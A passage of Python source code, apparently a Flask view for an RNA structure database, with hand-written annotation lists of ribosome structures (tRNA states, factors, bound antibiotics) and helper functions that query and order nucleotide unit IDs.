('4U26|1|AA', 'Empty', 'Bound to antibiotic', '-', 'Dalfopristin (B4) and Quinupristin (B6)'),\n ('4U26|1|CA', 'Empty', 'Bound to antibiotic', '-', 'Dalfopristin (D4) and Quinupristin (D6)'),\n ('4U27|1|AA', 'Empty', 'Bound to antibiotic', '-', 'Flopristin (BA) and Linopristin (B6)'),\n ('4U27|1|CA', 'Empty', 'Bound to antibiotic', '-', 'Flopristin (DA) and Linopristin (D6)'),\n ('4V4H|1|AA', 'Empty', 'Bound to antibiotic', '-', 'Kasugamycin (AA)'),\n ('4V4H|1|CA', 'Empty', 'Bound to antibiotic', '-', 'Kasugamycin (CA)'),\n ('4V52|1|AA', 'Empty', 'Bound to antibiotic', '-', 'Neomycin (AA & BB)'),\n ('4V52|1|CA', 'Empty', 'Bound to antibiotic', '-', 'Neomycin (CA & DB)'),\n ('4V53|1|AA', 'Empty', 'Bound to antibiotic', '-', 'Gentamycin (AA & BB)'),\n ('4V53|1|CA', 'Empty', 'Bound to antibiotic', '-', 'Gentamycin (CA & DB)'),\n ('4V54|1|AA', 'Empty', 'Ribosome recycling', 'RRF (B6)', '-'),\n ('4V54|1|CA', 'Empty', 'Ribosome recycling', 'RRF (D6)', '-'),\n ('4V55|1|AA', 'Empty', 'Ribosome recycling', 'RRF (B6)', 'Gentamycin (AA & BB)'),\n ('4V55|1|CA', 'Empty', 'Ribosome recycling', 'RRF (D6)', 'Gentamycin (CA & DB)'),\n ('4V56|1|AA', 'Empty', 'Bound to antibiotic', '-', 'Spectinomycin (AA)'),\n ('4V56|1|CA', 'Empty', 'Bound to antibiotic', '-', 'Spectinomycin (CA)'),\n ('4V57|1|AA', 'Empty', 'Bound to antibiotic', '-', 'Spectinomycin (AA) and Neomycin (AA & BB)'),\n ('4V57|1|CA', 'Empty', 'Bound to antibiotic', '-', 'Spectinomycin (CA) and Neomycin (CA & DB)'),\n ('4V64|1|AA', 'Empty', 'Bound to antibiotic', '-', 'Hygromycin B (AA)'),\n ('4V64|1|CA', 'Empty', 'Bound to antibiotic', '-', 'Hygromycin B (CA)'),\n ('4V7S|1|AA', 'Empty', 'Bound to antibiotic', '-', 'Telithromycin (BA)'),\n ('4V7S|1|CA', 'Empty', 'NB', '-', '-'),\n ('4V7T|1|AA', 'Empty', 'Bound to antibiotic', '-', 'Chloramphenicol (BA)'),\n ('4V7T|1|CA', 'Empty', 'NB', '-', '-'),\n ('4V7U|1|AA', 'Empty', 'Bound to antibiotic', '-', 'Erythromycin A (BA)'),\n ('4V7U|1|CA', 'Empty', 'NB', '-', '-'),\n ('4V7V|1|AA', 'Empty', 'Bound to antibiotic', '-', 'Clindamycin'),\n ('4V7V|1|CA', 'Empty', 'NB', '-', '-'), ('4V80|1|AA', '?', '?', '?', '?'),\n ('4V80|1|CA', '?', '?', '?', '?'), ('4V9C|1|AA', 'P/P', 'NO', '-', 'neomycin (AA & BA)'),\n ('4V9C|1|CA', 'P/E', 'NO', 'RRF(CY)', 'neomycin (CA & DA)'), ('4WF1|1|AA', '-', 'NB', '-', '-'),\n ('4WF1|1|CA', '-', 'Bound to antibiotic', '-', 'Negamycin (CA)'),\n ('4WOI|1|AA', 'P/E', 
'Bound to antibiotic', '-', 'Paromomycin (AA & BA)'),\n ('4WOI|1|DA', 'P/P', 'Bound to antibiotic', '-', 'Paromomycin (CA & DA)'),\n ('4WWW|1|QA', 'Empty', 'Bound to antibiotic', '-', 'CEM-101 (RA)'),\n ('4WWW|1|XA', 'Empty', 'NO', '-', '-'),\n ('5KCR|1|1a', 'P/P ', 'Bound to antibiotic', '-', 'Avilamycin C (1A)'),\n ('5KCS|1|1a', 'P/P ', 'Bound to antibiotic', 'TetM (1w)', 'Evernimycin (1A)'),\n ('3J9Y|1|a', 'P/P', 'NO', 'TetM (w)', '-'),\n ('3JCD|1|a', 'P/4 (8), E/E (9)', 'Elongation - Backtranslocation (Post EF4) ', 'EF4 (x)', '-'),\n ('3JCE|1|a', 'A/4 (6), P/4 (8), E/E (9)', 'Elongation - Backtranslocation (Pre EF4)', 'EF4 (x)', '-'),\n ('5AFI|1|a', 'A/T (y), P/P (v), E/E (w)', 'Elongation - Decoding', 'EF-Tu (z)', 'Kirromycin (z)'),\n ('5UYK|1|A', 'T tRNA (Y), P/P (W), E/E (X)', 'Elongation - Decoding', 'EF-Tu (Z)', '-'),\n ('5UYL|1|A', 'A*/T (Y), P/P (W), E/E (X)', 'Elongation - Decoding', 'EF-Tu (Z)', '-'),\n ('5UYM|1|A', 'A/T (Y), P/P (W), E/E (X)', 'Elongation - Decoding', 'EF-Tu (Z)', '-'),\n ('5UYN|1|A', 'T tRNA (Y), P/P (W), E/E (X)', 'Elongation - Decoding', 'EF-Tu (Z)', '-'),\n ('5UYP|1|A', 'A*/T (Y), P/P (W), E/E (X)', 'Elongation - Decoding', 'EF-Tu (Z)', '-'),\n ('5UYQ|1|A', 'A/T (Y), P/P (W), E/E (X)', 'Elongation - Decoding', 'EF-Tu (Z)', '-'),\n ('5WDT|1|a', 'A/T (y), P/P (v), E/E (w)', 'Elongation - Decoding', 'EF-Tu H84A (z)', '-'),\n ('5WE4|1|a', 'A/T (y), P/P (v), E/E (w)', 'Elongation - Decoding', 'EF-Tu (z)', '-'),\n ('5WE6|1|a', 'A/T (y), P/P (v), E/E (w)', 'Elongation - Decoding', 'EF-Tu H84A (z)', '-'),\n ('5WF0|1|a', 'A/T (y), P/P (v), E/E (w)', 'Elongation - Decoding', 'EF-Tu H84A (z)', '-'),\n ('5WFK|1|a', 'A/T (y), P/P (v), E/E (w)', 'Elongation - Decoding', 'EF-Tu H84A (z)', '-'),\n ('5WFS|1|a', 'A/T (y), P/P (v), E/E (w)', 'Elongation - Decoding', 'EF-Tu H84A (z)', '-'),\n ('3J9Z|1|SA', 'P/P (S6), E/E (S7)', 'Elongation - Translocation', 'EF-G (S1)', '-'),\n ('3JA1|1|SA', 'P/E (S2)', 'Elongation - Translocation', 'EF-G (S3)', '-'),\n ('3R8N|1|A', '?', 'Elongation - Translocation', '?', '-'),\n ('3R8O|1|A', '?', 'Elongation - Translocation', '?', '-'),\n ('3JCJ|1|g', 'P/I* ', 'Initiation', 'IF-2 (f)', '-'),\n ('6DNC|1|A', 'E/E (D), P/P (LA)', 'Premature Termination', 'RF1 (MA)', '-'),\n ('5NP6|1|D', 'P/P (B)', 'Recoding - Bypassing', '-', '-'), (\n '6H4N|1|a', 'E/E (w)', 'Ribosome hibernation',\n 'Ribosome modulation factor (v), ribosome hibernation promoting factor (x)', '-'),\n ('5H5U|1|h', 'P/P (5)', 'Ribosome Rescue', 'ArfA (3), RF2 (4)', '-'),\n ('5MDV|1|2', 'P/P (5)', 'Ribosome Rescue', 'ArfA (6), RF2 (7)', '-'),\n ('5MDW|1|2', 'P/P (5)', 'Ribosome Rescue', 'ArfA (6), RF2 (7)', '-'),\n ('5MDY|1|2', 'P/P (5)', 'Ribosome Rescue', 'ArfA (6), RF2 (7)', '-'),\n ('5MGP|1|a', 'P/P (x)', 'Ribosome Rescue', 'ArfA (w), RF2 (z)', '-'),\n ('5U4I|1|a', 'P/P (x), E*/E (y)', 'Ribosome Rescue', 'ArfA (w), RF2 (v)', '-'),\n ('5U4J|1|a', '?', 'Ribosome Rescue', 'ArfA (w), RF2 (v)', '-'),\n ('5U9F|1|A', 'P/P(W), E*/E (X)', 'Ribosome Rescue', 'ArfA (Y), RF2 (Z)', '-'),\n ('5U9G|1|A', 'P/P(W), E*/E (X)', 'Ribosome Rescue', 'ArfA (Y), RF2 (Z)', '-'),\n ('6ENF|1|a', 'P/P (x)', 'Ribosome Rescue', '-', '-'),\n ('6ENJ|1|a', 'A/A (9), P/P (x)', 'Ribosome Rescue', 'EF-P (w)', '-'),\n ('6ENU|1|a', 'P/P (x)', 'Ribosome Rescue', 'EF-P (w)', '-'),\n ('6C4I|1|a', 'P/P (x), E*/E (y)', 'Ribosome rescue', 'ArfA (w), RF-2 (v)', '-'),\n ('3JBU|1|A', 'P/P (v)', 'Ribosome Stalling', 'SecM (z)', '-'), (\n '3JBV|1|A', 'A/P* (V), P/E intermediate (W)', 'Ribosome Stalling', 'SecM (z)',\n 
'Chloroamphenicol (b)'), ('5JTE|1|AA', 'A/A (AW), P/P (AX), E/E* (AY)', 'Ribosome Stalling', '-',\n 'Erythromycin A (BA), ErmBL (B5)'),\n ('5JU8|1|AA', 'P/P (AX), E*/E* (AY)', 'Ribosome Stalling', '-', 'Erythromycin A (BA), ErmBL (B5)'),\n ('5NWY|1|0', 'P/P-VemP (M)', 'Ribosome Stalling', '-', 'VemP (s)'),\n ('5O2R|1|a', 'P/P (x)', 'Ribosome Stalling', 'RF-1 (v)', 'Apidaecin (z)'),\n ('5LZA|1|a', 'P/P (v)', 'SelB activation', '-', '-'),\n ('5LZD|1|a', 'A/SelB (y), P/P (v)', 'SelB activation', 'SelB (z)', '-'),\n ('5LZE|1|a+ 5LZE|1|y+ 5LZE|1|v+ 5LZE|1|x', 'tst', 'SelB activation', 'tst', 'tst'),\n ('5IQR|1|2', 'A/R (6), P/P (5), E/E (4)', 'Stringent Control', 'RelA (8)', 'Paromomycine (2)'),\n ('5KPS|1|27', 'P/P (31), E/E (32)', 'Stringent Control', 'RelA (A)', '-'),\n ('5KPW|1|26', 'A/R (30), P/P (31), E/E (32)', 'Stringent Control', 'RelA (33)', '-'),\n ('5KPX|1|26', 'A/R (30), P/P (31), E/E (32)', 'Stringent Control', 'RelA (33)', '-'),\n ('5L3P|1|a', 'A/R( y), P/P (x)', 'Stringent Control', 'RelA (z)', '-'),\n ('4V85|1|AA', '-', 'Termination', 'RF3 (AW)', 'Viomycin (AY)'),\n ('4V89|1|AA', '-', 'Termination', 'RF3 (AW)', '-'),\n ('4V6C|1|AA', '-', 'Translation - elongation', '-', '-'),\n ('4V6C|1|CA', '-', 'Translation - elongation', '-', '-'),\n ('4V6D|1|AA', 'P-site ASL fragment', 'Translation - elongation', '-', '-'),\n ('4V6D|1|CA', 'P-site ASL fragment', 'Translation - elongation', '-', '-'), (\n '4V6E|1|AA', 'A-site ASL fragment (AX), P-site ASL fragment (AV)', 'Translation - elongation',\n '-',\n '-'), (\n '4V6E|1|CA', 'A-site ASL fragment (CX), P-site ASL fragment (CV)', 'Translation - elongation',\n '-',\n '-')]\n\n annotation_LSU = [('4V4Q|1|BB', 'Empty', 'NO', '-', '-'), ('4V4Q|1|DB', 'Empty', 'NO', '-', '-'),\n ('4V50|1|BB', 'P-site of SSU only', 'NO', '-', '-'),\n ('4V50|1|DB', 'P-site of SSU only', 'NO', '-', '-'), ('4V5B|1|AB', 'Empty', 'NO', '-', '-'),\n ('4V5B|1|CB', 'Empty', 'NO', '-', '-'),\n ('4V9D|1|CA', 'P/E', 'Ribosome Recycling (early intermediate)', 'RRF (AY)', '-'),\n ('4V9D|1|DA', 'P/P', 'Posttermination', 'none', '-'),\n ('4V9O|1|AA', 'Empty', 'Elongation - pretranslocation', 'EF-G (BV)', 'Viomycin (BW)'),\n ('4V9O|1|CA', 'Empty', 'Elongation - pretranslocation', 'EF-G (DV)', 'Viomycin (DW)'),\n ('4V9O|1|EA', 'Empty', 'Elongation - pretranslocation', 'EF-G (FV)', 'Viomycin (FW)'),\n ('4V9O|1|GA', 'Empty', 'Elongation - pretranslocation', 'EF-G (HV)', 'Viomycin (HW)'),\n ('4V9P|1|AA', 'Empty', 'Elongation - pretranslocation', 'EF-G (BV)', 'Viomycin (BW)'),\n ('4V9P|1|CA', 'Empty', 'Elongation - pretranslocation', 'EF-G (DV)', 'Viomycin (DW)'),\n ('4V9P|1|EA', 'Empty', 'Elongation - pretranslocation', 'EF-G (FV)', 'Viomycin (FW)'),\n ('4V9P|1|GA', 'Empty', 'Elongation - pretranslocation', 'EF-G (HV)', '-'),\n ('4YBB|1|DA', 'Empty', 'NO', '-', '-'), ('4YBB|1|CA', 'Empty', 'NO', '-', '-'),\n ('5IT8|1|DA', 'Empty', 'NO', '-', '-'), ('5IT8|1|CA', 'Empty', 'NO', '-', '-'),\n ('5J5B|1|DA', 'Empty', 'Bound to antibiotic', '-', 'Tetracycline (AA)'),\n ('5J5B|1|CA', 'Empty', 'Bound to antibiotic', '-', 'Tetracycline (BA)'),\n ('5J7L|1|DA', 'Empty', 'Bound to antibiotic', '-', 'Tetracycline (AA)'),\n ('5J7L|1|CA', 'Empty', 'Bound to antibiotic', '-', 'Tetracycline (BA)'),\n ('5J88|1|DA', 'Empty', 'NO', '-', '-'), ('5J88|1|CA', 'Empty', 'NO', '-', '-'),\n ('5J8A|1|DA', 'Empty', 'Bound to antibiotic', '-', 'Tigecycline (AA)'),\n ('5J8A|1|CA', 'Empty', 'Bound to antibiotic', '-', 'Tigecycline (BA)'),\n ('5J91|1|DA', 'Empty', 'Bound to antibiotic', '-', 'Tigecycline (AA)'),\n 
('5J91|1|CA', 'Empty', 'Bound to antibiotic', '-', 'Tigecycline (BA)'),\n ('5JC9|1|DA', 'Empty', 'NO', '-', '-'), ('5JC9|1|CA', 'Empty', 'NO', '-', '-'),\n ('5MDZ|1|1', 'P-site ', 'NO', '-', '-'),\n ('6BU8|1|01', 'Appears to be A/A, P/P, E/E ', 'NO', '-', '-'),\n ('6GWT|1|A', 'P/RF1 ', 'Termination', 'RF1 (v), RF3 (w)', 'Apidaecin (z)'),\n ('6GXM|1|A', 'P/RF1 ', 'Termination', 'RF1 (v), RF3 (w)', 'Apidaecin (z)'),\n ('6GXN|1|A', 'P/RF1', 'Termination', 'RF1 (v), RF3 (w)', 'Apidaecin (z)'),\n ('6GXO|1|A', 'P/E', 'Termination', 'RF1 (v), RF3 (w)', 'Apidaecin (z)'),\n ('6I7V|1|CA*', 'Empty', 'Ribosome heterogeneity ', '-', '-'),\n ('6I7V|1|DA*', 'Empty', 'Ribosome heterogeneity ', '-', '-'),\n ('4U1U|1|BA', 'Empty', 'Bound to antibiotic', '-', 'Quinupristin (B6)'),\n ('4U1U|1|DA', 'Empty', 'Bound to antibiotic', '-', 'Quinupristin (D6)'),\n ('4U1V|1|BA', 'Empty', 'Bound to antibiotic', '-', 'Linopristin (B6)'),\n ('4U1V|1|DA', 'Empty', 'Bound to antibiotic', '-', 'Linopristin (D6)'),\n ('4U20|1|BA', 'Empty', 'Bound to antibiotic', '-', 'Flopristin (BA)'),\n ('4U20|1|DA', 'Empty', 'Bound to antibiotic', '-', 'Flopristin (DA)'),\n ('4U24|1|BA', 'Empty', 'Bound to antibiotic', '-', 'Dalfopristin (BA)'),\n ('4U24|1|DA', 'Empty', 'Bound to antibiotic', '-', 'Dalfopristin (DA)'),\n ('4U25|1|BA', 'Empty', 'Bound to antibiotic', '-', 'Virginiamycin (BA)'),\n ('4U25|1|DA', 'Empty', 'Bound to antibiotic', '-', 'Virginiamycin (DA)'),\n ('4U26|1|BA', 'Empty', 'Bound to antibiotic', '-', 'Dalfopristin (B4) and Quinupristin (B6)'),\n ('4U26|1|DA', 'Empty', 'Bound to antibiotic', '-', 'Dalfopristin (D4) and Quinupristin (D6)'),\n ('4U27|1|BA', 'Empty', 'Bound to antibiotic', '-', 'Flopristin (BA) and Linopristin (B6)'),\n ('4U27|1|DA', 'Empty', 'Bound to antibiotic', '-', 'Flopristin (DA) and Linopristin (D6)'),\n ('4V4H|1|BB', 'Empty', 'Bound to antibiotic', '-', 'Kasugamycin (AA)'),\n ('4V4H|1|DB', 'Empty', 'Bound to antibiotic', '-', 'Kasugamycin (CA)'),\n ('4V52|1|BB', 'Empty', 'Bound to antibiotic', '-', 'Neomycin (AA & BB)'),\n ('4V52|1|DB', 'Empty', 'Bound to antibiotic', '-', 'Neomycin (CA & DB)'),\n ('4V53|1|BB', 'Empty', 'Bound to antibiotic', '-', 'Gentamycin (AA & BB)'),\n ('4V53|1|DB', 'Empty', 'Bound to antibiotic', '-', 'Gentamycin (CA & DB)'),\n ('4V54|1|BB', 'Empty', 'Ribosome recycling', 'RRF (B6)', '-'),\n ('4V54|1|DB', 'Empty', 'Ribosome recycling', 'RRF (D6)', '-'),\n ('4V55|1|BB', 'Empty', 'Ribosome recycling', 'RRF (B6)', 'Gentamycin (AA & BB)'),\n ('4V55|1|DB', 'Empty', 'Ribosome recycling', 'RRF (D6)', 'Gentamycin (CA & DB)'),\n ('4V56|1|BB', 'Empty', 'Bound to antibiotic', '-', 'Spectinomycin (AA)'),\n ('4V56|1|DB', 'Empty', 'Bound to antibiotic', '-', 'Spectinomycin (CA)'),\n ('4V57|1|BB', 'Empty', 'Bound to antibiotic', '-', 'Spectinomycin (AA) and Neomycin (AA & BB)'),\n ('4V57|1|DB', 'Empty', 'Bound to antibiotic', '-', 'Spectinomycin (CA) and Neomycin (CA & DB)'),\n ('4V64|1|BB', 'Empty', 'Bound to antibiotic', '-', 'Hygromycin B (AA)'),\n ('4V64|1|DB', 'Empty', 'Bound to antibiotic', '-', 'Hygromycin B (CA)'),\n ('4V7S|1|BA', 'Empty', 'Bound to antibiotic', '-', 'Telithromycin (BA)'),\n ('4V7S|1|DA', 'Empty', 'NB', '-', '-'),\n ('4V7T|1|BA', 'Empty', 'Bound to antibiotic', '-', 'Chloramphenicol (BA)'),\n ('4V7T|1|DA', 'Empty', 'NB', '-', '-'),\n ('4V7U|1|BA', 'Empty', 'Bound to antibiotic', '-', 'Erythromycin A (BA)'),\n ('4V7U|1|DA', 'Empty', 'NB', '-', '-'),\n ('4V7V|1|BA', 'Empty', 'Bound to antibiotic', '-', 'Clindamycin'),\n ('4V7V|1|DA', 'Empty', 'NB', '-', '-'), 
('4V9C|1|BA', 'P/P', 'NO', '-', 'neomycin (AA & BA)'),\n ('4V9C|1|DA', 'P/E', 'NO', 'RRF(CY)', 'neomycin (CA & DA)'), ('4WF1|1|BA', '-', 'NB', '-', '-'),\n ('4WF1|1|DA', '-', 'Bound to antibiotic', '-', 'Negamycin (CA)'),\n ('4WOI|1|BA', 'P/E', 'Bound to antibiotic', '-', 'Paromomycin (AA & BA)'),\n ('4WOI|1|CA', 'P/P', 'Bound to antibiotic', '-', 'Paromomycin (CA & DA)'),\n ('4WWW|1|RA', 'Empty', 'Bound to antibiotic', '-', 'CEM-101 (RA)'),\n ('4WWW|1|YA', 'Empty', 'NO', '-', '-'),\n ('5KCR|1|1A', 'P/P ', 'Bound to antibiotic', '-', 'Avilamycin C (1A)'),\n ('5KCS|1|1A', 'P/P ', 'Bound to antibiotic', 'TetM (1w)', 'Evernimycin (1A)'),\n ('3J9Y|1|A', 'P/P', 'NO', 'TetM (w)', '-'),\n ('3JCD|1|A', 'P/4 (8), E/E (9)', 'Elongation - Backtranslocation (Post EF4) ', 'EF4 (x)', '-'), (\n '3JCE|1|A', 'A/4 (6), P/4 (8), E/E (9)', 'Elongation - Backtranslocation (Pre EF4)',\n 'EF4 (x)',\n '-'),\n ('5AFI|1|A', 'A/T (y), P/P (v), E/E (w)', 'Elongation - Decoding', 'EF-Tu (z)', 'Kirromycin (z)'),\n ('5UYK|1|01', 'T tRNA (Y), P/P (W), E/E (X)', 'Elongation - Decoding', 'EF-Tu (Z)', '-'),\n ('5UYL|1|01', 'A*/T (Y), P/P (W), E/E (X)', 'Elongation - Decoding', 'EF-Tu (Z)', '-'),\n ('5UYM|1|01', 'A/T (Y), P/P (W), E/E (X)', 'Elongation - Decoding', 'EF-Tu (Z)', '-'),\n ('5UYN|1|01', 'T tRNA (Y), P/P (W), E/E (X)', 'Elongation - Decoding', 'EF-Tu (Z)', '-'),\n ('5UYP|1|01', 'A*/T (Y), P/P (W), E/E (X)', 'Elongation - Decoding', 'EF-Tu (Z)', '-'),\n ('5UYQ|1|01', 'A/T (Y), P/P (W), E/E (X)', 'Elongation - Decoding', 'EF-Tu (Z)', '-'),\n ('5WDT|1|A', 'A/T (y), P/P (v), E/E (w)', 'Elongation - Decoding', 'EF-Tu H84A (z)', '-'),\n ('5WE4|1|A', 'A/T (y), P/P (v), E/E (w)', 'Elongation - Decoding', 'EF-Tu (z)', '-'),\n ('5WE6|1|A', 'A/T (y), P/P (v), E/E (w)', 'Elongation - Decoding', 'EF-Tu H84A (z)', '-'),\n ('5WF0|1|A', 'A/T (y), P/P (v), E/E (w)', 'Elongation - Decoding', 'EF-Tu H84A (z)', '-'),\n ('5WFK|1|A', 'A/T (y), P/P (v), E/E (w)', 'Elongation - Decoding', 'EF-Tu H84A (z)', '-'),\n ('5WFS|1|A', 'A/T (y), P/P (v), E/E (w)', 'Elongation - Decoding', 'EF-Tu H84A (z)', '-'),\n ('3J9Z|1|LA', 'P/P (S6), E/E (S7)', 'Elongation - Translocation', 'EF-G (S1)', '-'),\n ('3JA1|1|LA', 'P/E (S2)', 'Elongation - Translocation', 'EF-G (S3)', '-'),\n ('3JCJ|1|A', 'P/I* ', 'Initiation', 'IF-2 (f)', '-'),\n ('6DNC|1|B', 'E/E (D), P/P (LA)', 'Premature Termination', 'RF1 (MA)', '-'),\n ('5NP6|1|Y', 'P/P (B)', 'Recoding - Bypassing', '-', '-'), (\n '6H4N|1|A', 'E/E (w)', 'Ribosome hibernation',\n 'Ribosome modulation factor (v), ribosome hibernation promoting factor (x)', '-'),\n ('5H5U|1|A', 'P/P (5)', 'Ribosome Rescue', 'ArfA (3), RF2 (4)', '-'),\n ('5MDV|1|1', 'P/P (5)', 'Ribosome Rescue', 'ArfA (6), RF2 (7)', '-'),\n ('5MDW|1|1', 'P/P (5)', 'Ribosome Rescue', 'ArfA (6), RF2 (7)', '-'),\n ('5MDY|1|1', 'P/P (5)', 'Ribosome Rescue', 'ArfA (6), RF2 (7)', '-'),\n ('5MGP|1|A', 'P/P (x)', 'Ribosome Rescue', 'ArfA (w), RF2 (z)', '-'),\n ('5U4I|1|A', 'P/P (x), E*/E (y)', 'Ribosome Rescue', 'ArfA (w), RF2 (v)', '-'),\n ('5U4J|1|A', '?', 'Ribosome Rescue', 'ArfA (w), RF2 (v)', '-'),\n ('5U9F|1|01', 'P/P(W), E*/E (X)', 'Ribosome Rescue', 'ArfA (Y), RF2 (Z)', '-'),\n ('5U9G|1|01', 'P/P(W), E*/E (X)', 'Ribosome Rescue', 'ArfA (Y), RF2 (Z)', '-'),\n ('6ENF|1|A', 'P/P (x)', 'Ribosome Rescue', '-', '-'),\n ('6ENJ|1|A', 'A/A (9), P/P (x)', 'Ribosome Rescue', 'EF-P (w)', '-'),\n ('6ENU|1|A', 'P/P (x)', 'Ribosome Rescue', 'EF-P (w)', '-'),\n ('6C4I|1|A', 'P/P (x), E*/E (y)', 'Ribosome rescue', 'ArfA (w), RF-2 (v)', '-'),\n ('3JBU|1|b', 'P/P 
(v)', 'Ribosome Stalling', 'SecM (z)', '-'), (\n '3JBV|1|b', 'A/P* (V), P/E intermediate (W)', 'Ribosome Stalling', 'SecM (z)',\n 'Chloroamphenicol (b)'),\n ('5JTE|1|BA', 'A/A (AW), P/P (AX), E/E* (AY)', 'Ribosome Stalling', '-',\n 'Erythromycin A (BA), ErmBL (B5)'), (\n '5JU8|1|BA', 'P/P (AX), E*/E* (AY)', 'Ribosome Stalling', '-',\n 'Erythromycin A (BA), ErmBL (B5)'),\n ('5NWY|1|N', 'P/P-VemP (M)', 'Ribosome Stalling', '-', 'VemP (s)'),\n ('5O2R|1|A', 'P/P (x)', 'Ribosome Stalling', 'RF-1 (v)', 'Apidaecin (z)'),\n ('5LZA|1|A', 'P/P (v)', 'SelB activation', '-', '-'),\n ('5LZD|1|A', 'A/SelB (y), P/P (v)', 'SelB activation', 'SelB (z)', '-'),\n ('5IQR|1|1', 'A/R (6), P/P (5), E/E (4)', 'Stringent Control', 'RelA (8)', 'Paromomycine (2)'),\n ('5KPS|1|28', 'P/P (31), E/E (32)', 'Stringent Control', 'RelA (A)', '-'),\n ('5KPW|1|27', 'A/R (30), P/P (31), E/E (32)', 'Stringent Control', 'RelA (33)', '-'),\n ('5KPX|1|27', 'A/R (30), P/P (31), E/E (32)', 'Stringent Control', 'RelA (33)', '-'),\n ('5L3P|1|A', 'A/R( y), P/P (x)', 'Stringent Control', 'RelA (z)', '-'),\n ('4V85|1|BA', '-', 'Termination', 'RF3 (AW)', 'Viomycin (AY)'),\n ('4V89|1|BA', '-', 'Termination', 'RF3 (AW)', '-'),\n ('4V6C|1|BA', '-', 'Translation - elongation', '-', '-'),\n ('4V6C|1|DA', '-', 'Translation - elongation', '-', '-'),\n ('4V6D|1|BA', 'P-site ASL fragment', 'Translation - elongation', '-', '-'),\n ('4V6D|1|DA', 'P-site ASL fragment', 'Translation - elongation', '-', '-'), (\n '4V6E|1|BA', 'A-site ASL fragment (AX), P-site ASL fragment (AV)', 'Translation - elongation',\n '-', '-'), (\n '4V6E|1|DA', 'A-site ASL fragment (CX), P-site ASL fragment (CV)', 'Translation - elongation',\n '-', '-'), ('3J7Z|1|A', 'Empty', 'Ribosome Stalling', 'ErmCL (a)', 'Erythromycin A (A)'),\n ('6GC0|1|A', 'Empty', 'Ribosome Assembly', '-', '-'),\n ('4UY8|1|A', 'Empty', 'Ribosome Stalling', 'TnaC (7)', '-'),\n ('6GC8|1|A', 'Empty', 'Ribosome Assembly', '-', '-'), ('4V80|1|BA', '?', '?', '?', '?'),\n ('4V80|1|DA', '?', '?', '?', '?'), ('6GBZ|1|A', 'Empty', 'Ribosome Assembly', '-', '-'),\n ('6C4H|1|A', 'P-site ', 'Termination', 'RF2 (v)', '-'),\n ('5GAE|1|A', '?', 'Co-translational protein targeting', '-', '-'), (\n '5GAD|1|A', 'ESRP (1)', 'Co-translational protein targeting',\n 'SRP protein (i), SRP receptor (l)',\n '-'), ('5GAH|1|A', 'ESRP (1)', 'Co-translational protein targeting', 'SRP protein (i)', '-'),\n ('5GAG|1|A', 'ESRP (1)', 'Co-translational protein targeting', 'SRP protein (i)', '-'),\n ('5LZE|1|A', '?', 'Pre-translocation SelB', '?', '?')]\n\n data = request.args['units']\n\n query_list = input_type(data)\n\n reject_list = ['5AFI|1|A', '5LZE|1|A', '4WRO|1|3L', '4WSD|1|1K', '4WSD|1|1L', '4WSD|1|3L', '4WT1|1|1K', '4WT1|1|1L', '4WT1|1|3K', '4WT1|1|3L', '4WZO|1|3K', '4WZO|1|3L', '4Y4P|1|1w']\n\n #######################################################################################################\n def getKey(item):\n return item[0]\n\n #######################################################################################################\n def get_chain_idx(query):\n\n range_selection = []\n for elem in query:\n range_selection.append(elem)\n\n chain_idx = []\n for sublist in query:\n units_query = UnitInfo.query.filter(UnitInfo.unit_id.in_(sublist))\n\n for rows in units_query:\n chain_idx.append(rows.chain_index)\n\n return chain_idx\n\n query_type = check_query(query_list)\n\n if query_type != 'loop_id':\n query_ife = '|'.join(query_list[0][0].split('|')[:3])\n query_pdb = query_list[0][0].split('|')[0]\n query_chain = 
query_list[0][0].split('|')[2]\n else:\n pass\n\n #######################################################################################################\n def get_sorted_units(units):\n unsorted_units = units.split(',')\n sorted_units = sorted(unsorted_units, key=lambda x: int(x.split('|')[4]))\n return sorted_units\n ########################################################################################################\n def check_insertion(corr_units):\n # iterate over a shallow copy: removing items from the list being iterated skips elements\n for unit in list(corr_units):\n ife_num = unit.split('|')[-1]\n try:\n num = int(ife_num)\n except ValueError:\n corr_units.remove(unit)\n\n return corr_units\n #########################################################################################################\n def custom_order(dct, spec):\n res = OrderedDict()\n for key in spec:\n if key in dct:\n res[key] = dct.pop(key)\n res.update(dct.items())\n\n return res\n #########################################################################################################\n def group_corr(corr_list):\n corr_list.sort()\n keyf = lambda x: '|'.join(x.split('|')[:3])\n corr_grouped = [list(items) for gr, items in groupby(corr_list, key=keyf)]\n\n return corr_grouped\n #########################################################################################################\n def order_num(corr_list):\n\n rej_sub = []\n # iterate over a copy for the same reason as in check_insertion above\n for unit in list(corr_list):\n try:\n unit.sort(key=lambda x: int(x.split('|')[-1]))\n except ValueError:\n rej_sub.append(unit)\n corr_list.remove(unit)\n\n return corr_list\n ##########################################################################################################\n \n units_complete_list = []\n\n if query_type == 'single_range':\n\n chain_idx = get_chain_idx(query_list)\n chain_idx.sort()\n\n units_query = UnitInfo.query.filter_by(pdb_id=query_pdb, chain=query_chain). \\\n filter(UnitInfo.chain_index.between(chain_idx[0], chain_idx[1])) \\\n .order_by(UnitInfo.chain_index).all()\n\n for row in units_query:\n units_complete_list.append(row.unit_id)\n\n elif query_type == 'multiple_ranges':\n chain_idx = get_chain_idx(query_list)\n chain_idx.sort()\n partition_size = len(query_list)\n # Partition the list into a list of lists containing the start and end units of each range\n chain_idx = [chain_idx[i:i + 2] for i in range(0, len(chain_idx), 2)]\n\n for i in chain_idx:\n units_query = UnitInfo.query.filter_by(pdb_id=query_pdb, chain=query_chain). 
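custom_order above pulls the keys named in spec to the front and appends whatever is left; note that it mutates the input dict via pop. A tiny standalone check of that behavior (keys and values are illustrative):

from collections import OrderedDict

d = OrderedDict([('b', 2), ('a', 1), ('c', 3)])
reordered = custom_order(d, ['a', 'c'])
print(list(reordered.keys()))  # ['a', 'c', 'b']
print(len(d))                  # 1: 'a' and 'c' were popped out of the input dict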
\\\n filter(UnitInfo.chain_index.between(i[0], i[1])) \\\n .order_by(UnitInfo.chain_index).all()\n for row in units_query:\n units_complete_list.append(row.unit_id)\n\n units_complete_list = list(OrderedDict.fromkeys(units_complete_list))\n\n elif query_type == 'units_str':\n\n for unit in query_list:\n units_complete_list.append(unit[0])\n\n # todo work to do\n elif query_type == 'loop_id':\n\n loop_id = query_list[0][0]\n units_query = LoopInfo.query.filter_by(loop_id=loop_id)\n\n for row in units_query:\n unsorted_units = row.unit_ids\n loop_position = row.loop_name\n\n units_complete_list = get_sorted_units(unsorted_units)\n query_ife = '|'.join(units_complete_list[0].split('|')[:3])\n query_pdb = units_complete_list[0].split('|')[0]\n\n ##########################################################################################################\n\n # This section of the code deals with 